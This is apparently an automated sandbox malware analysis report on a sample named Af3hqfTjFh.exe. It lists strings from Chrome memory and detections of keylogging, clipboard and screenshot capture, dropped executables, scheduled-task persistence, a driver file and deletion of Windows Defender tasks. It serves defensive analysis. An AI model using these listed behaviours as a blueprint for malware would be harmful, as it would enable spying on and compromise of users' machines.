Source: chrome.exe, 0000002D.00000002.1772750526.00005B0400AA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/browser-features/
Source: chrome.exe, 0000002D.00000002.1772750526.00005B0400AA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/browser-tools/
Source: chrome.exe, 0000002D.00000003.1651077521.00005B0000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
Source: chrome.exe, 0000002D.00000002.1776784011.00005B0400E04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1776248128.00005B0400CD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1846404832.00005B04018E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 0000002D.00000002.1762097403.00005B0400174000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1767884735.00005B0400928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1844256638.00005B0401578000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1763053242.00005B04004E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1763959544.00005B04006EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1777350807.00005B0400EF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: chrome.exe, 0000002D.00000002.1763406635.00005B0400580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717142339.00005B0401A8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717328921.00005B04016F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
Source: chrome.exe, 0000002D.00000003.1717328921.00005B04016F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
Source: chrome.exe, 0000002D.00000003.1651077521.00005B0000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: chrome.exe, 0000002D.00000002.1763330286.00005B040055C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 0000002D.00000003.1652434713.00005B000065C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
Source: chrome.exe, 0000002D.00000003.1651077521.00005B0000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
Source: chrome.exe, 0000002D.00000003.1652434713.00005B000065C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/shieldedids.managerForcedOn_PlusAddressAndroidOpenGmsCoreManagementP
Source: chrome.exe, 0000002D.00000003.1652434713.00005B000065C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/shieldedids.managerPlusAddressOfferCreationIfPasswordFieldIsNotVisib
Source: chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 0000002D.00000002.1761614499.00005B0400094000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1772224335.00005B0400978000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 0000002D.00000003.1717142339.00005B0401A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chrome.exe, 0000002D.00000003.1717414295.00005B0401B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1690007828.00005B04017C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1847775694.00005B0401ACC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717249840.00005B0401B1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717195221.00005B0401B14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717142339.00005B0401A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chrome.exe, 0000002D.00000003.1717783680.00005B0401428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717142339.00005B0401A8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717328921.00005B04016F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.VtzkEync3_c.2019.O/rt=j/m=q_dnp
Source: chrome.exe, 0000002D.00000003.1717783680.00005B0401428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717142339.00005B0401A8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717328921.00005B04016F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.Rc_yzHk8ifQ.L.W.O/m=qmd
Source: 68qi5p.27.dr String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: chrome.exe, 0000002D.00000002.1772711956.00005B0400A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1843799682.00005B0401568000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 0000002D.00000002.1788213185.00005B04011B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1772711956.00005B0400A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1793807072.00005B0401428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1778715418.00005B0401084000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717783680.00005B0401428000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 0000002D.00000002.1846887338.00005B0401988000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1844256638.00005B0401578000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1846341231.00005B04018D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1779009107.00005B04010F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: chrome.exe, 0000002D.00000002.1846341231.00005B04018D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html7
Contains functionality for read data from the clipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0043E260 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard, 24_2_0043E260
Contains functionality to read the clipboard data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0043E260 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard, 24_2_0043E260
Contains functionality to record screenshots
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0043E7BD GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject, 24_2_0043E7BD
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E4AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput, 0_2_00E4AA57
Potential key logger detected (key state polling based)
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E79576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_00E79576
Yara detected Keylogger Generic
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\svchost015.exe, type: DROPPED

System Summary
barindex
Binary is likely a compiled AutoIt script file
Source: Af3hqfTjFh.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Af3hqfTjFh.exe, 00000000.00000002.872746384.0000000000EA2000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_bb46327d-9
Source: Af3hqfTjFh.exe, 00000000.00000002.872746384.0000000000EA2000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_1f1023b3-8
Source: Af3hqfTjFh.exe String found in binary or memory: This is a third-party compiled AutoIt script. memstr_5d84e915-4
Source: Af3hqfTjFh.exe String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_fce6621e-2
Creates HTA files
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe File created: C:\Users\user\AppData\Local\Temp\tOEPAwmQl.hta Jump to behavior
PE file contains section with special chars
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE.5.dr Static PE information: section name:
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE.5.dr Static PE information: section name: .idata
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE.5.dr Static PE information: section name:
Source: rapes.exe.10.dr Static PE information: section name:
Source: rapes.exe.10.dr Static PE information: section name: .idata
Source: rapes.exe.10.dr Static PE information: section name:
Source: random[1].exe.21.dr Static PE information: section name:
Source: random[1].exe.21.dr Static PE information: section name: .idata
Source: random[1].exe.21.dr Static PE information: section name:
Source: 466f8e521c.exe.21.dr Static PE information: section name:
Source: 466f8e521c.exe.21.dr Static PE information: section name: .idata
Source: 466f8e521c.exe.21.dr Static PE information: section name:
Source: random[1].exe1.21.dr Static PE information: section name:
Source: random[1].exe1.21.dr Static PE information: section name: .idata
Source: random[1].exe1.21.dr Static PE information: section name:
Source: 466a80d633.exe.21.dr Static PE information: section name:
Source: 466a80d633.exe.21.dr Static PE information: section name: .idata
Source: 466a80d633.exe.21.dr Static PE information: section name:
Source: f4d01cf3f8.exe.43.dr Static PE information: section name:
Source: f4d01cf3f8.exe.43.dr Static PE information: section name: .idata
Source: f4d01cf3f8.exe.43.dr Static PE information: section name:
Source: 01ea7855d3.exe.43.dr Static PE information: section name:
Source: 01ea7855d3.exe.43.dr Static PE information: section name: .idata
Source: 01ea7855d3.exe.43.dr Static PE information: section name:
Powershell drops PE file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Jump to dropped file
Contains functionality to communicate with device drivers
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E4D5EB: CreateFileW,DeviceIoControl,CloseHandle, 0_2_00E4D5EB
Contains functionality to launch a process as a different user
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E41201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00E41201
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E4E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 0_2_00E4E8F6
Creates driver files
Source: C:\Users\user\AppData\Local\Temp\10351780101\apple.exe File created: C:\Users\user\AppData\Local\Temp\ssisd.sys
Creates files inside the system directory
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE File created: C:\Windows\Tasks\rapes.job Jump to behavior
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe File created: C:\Windows\Tasks\futors.job
Deletes files inside the Windows folder
Source: C:\Windows\System32\cmd.exe File deleted: C:\Windows\System32\Tasks\Microsoft\Windows\Windows Defender
Detected potential crypto function
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E52046 0_2_00E52046
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00DE8060 0_2_00DE8060
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E48298 0_2_00E48298
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E1E4FF 0_2_00E1E4FF
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E1676B 0_2_00E1676B
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00DECAF0 0_2_00DECAF0
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E0CAA0 0_2_00E0CAA0
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00DFCC39 0_2_00DFCC39
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E16DD9 0_2_00E16DD9
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00DE91C0 0_2_00DE91C0
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00DFB119 0_2_00DFB119
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E01394 0_2_00E01394
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E01706 0_2_00E01706
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E0781B 0_2_00E0781B
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E019B0 0_2_00E019B0
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00DF997D 0_2_00DF997D
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00DE7920 0_2_00DE7920
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E07A4A 0_2_00E07A4A
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E07CA7 0_2_00E07CA7
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E01C77 0_2_00E01C77
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E19EEE 0_2_00E19EEE
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E6BE44 0_2_00E6BE44
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00DEBF40 0_2_00DEBF40
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E01F32 0_2_00E01F32
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748EA5A10 22_2_00007FF748EA5A10
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F4BA20 22_2_00007FF748F4BA20
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748EFEA00 22_2_00007FF748EFEA00
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F16A30 22_2_00007FF748F16A30
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748E949F0 22_2_00007FF748E949F0
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748EA89F0 22_2_00007FF748EA89F0
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F3424A 22_2_00007FF748F3424A
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F3CA6C 22_2_00007FF748F3CA6C
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F0CA90 22_2_00007FF748F0CA90
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748E819A0 22_2_00007FF748E819A0
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748EE5150 22_2_00007FF748EE5150
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F4F2F4 22_2_00007FF748F4F2F4
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F10B00 22_2_00007FF748F10B00
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748E90310 22_2_00007FF748E90310
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748ECBAF0 22_2_00007FF748ECBAF0
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F1A140 22_2_00007FF748F1A140
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748EB32E0 22_2_00007FF748EB32E0
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748E8B2D0 22_2_00007FF748E8B2D0
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748E9F280 22_2_00007FF748E9F280
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F01270 22_2_00007FF748F01270
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F561C0 22_2_00007FF748F561C0
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748ED1A50 22_2_00007FF748ED1A50
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F3F1E4 22_2_00007FF748F3F1E4
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F321F0 22_2_00007FF748F321F0
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748EAEA20 22_2_00007FF748EAEA20
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F2D420 22_2_00007FF748F2D420
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F3D450 22_2_00007FF748F3D450
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F3CC70 22_2_00007FF748F3CC70
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F34C70 22_2_00007FF748F34C70
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F4F478 22_2_00007FF748F4F478
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748E95B70 22_2_00007FF748E95B70
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F23CD0 22_2_00007FF748F23CD0
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748ED8330 22_2_00007FF748ED8330
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748EDA320 22_2_00007FF748EDA320
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F4C508 22_2_00007FF748F4C508
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748ED1D10 22_2_00007FF748ED1D10
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F3BB20 22_2_00007FF748F3BB20
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F4B340 22_2_00007FF748F4B340
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F3E344 22_2_00007FF748F3E344
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748EDBCE0 22_2_00007FF748EDBCE0
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748ECB4E0 22_2_00007FF748ECB4E0
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748EB7CB0 22_2_00007FF748EB7CB0
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F113F0 22_2_00007FF748F113F0
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F4B628 22_2_00007FF748F4B628
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F52E48 22_2_00007FF748F52E48
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F1A660 22_2_00007FF748F1A660
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F0D670 22_2_00007FF748F0D670
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F49694 22_2_00007FF748F49694
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F2CE90 22_2_00007FF748F2CE90
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748E8DD80 22_2_00007FF748E8DD80
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F34EB0 22_2_00007FF748F34EB0
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F3CEB4 22_2_00007FF748F3CEB4
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748EE1710 22_2_00007FF748EE1710
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F3A534 22_2_00007FF748F3A534
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F3E548 22_2_00007FF748F3E548
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F43550 22_2_00007FF748F43550
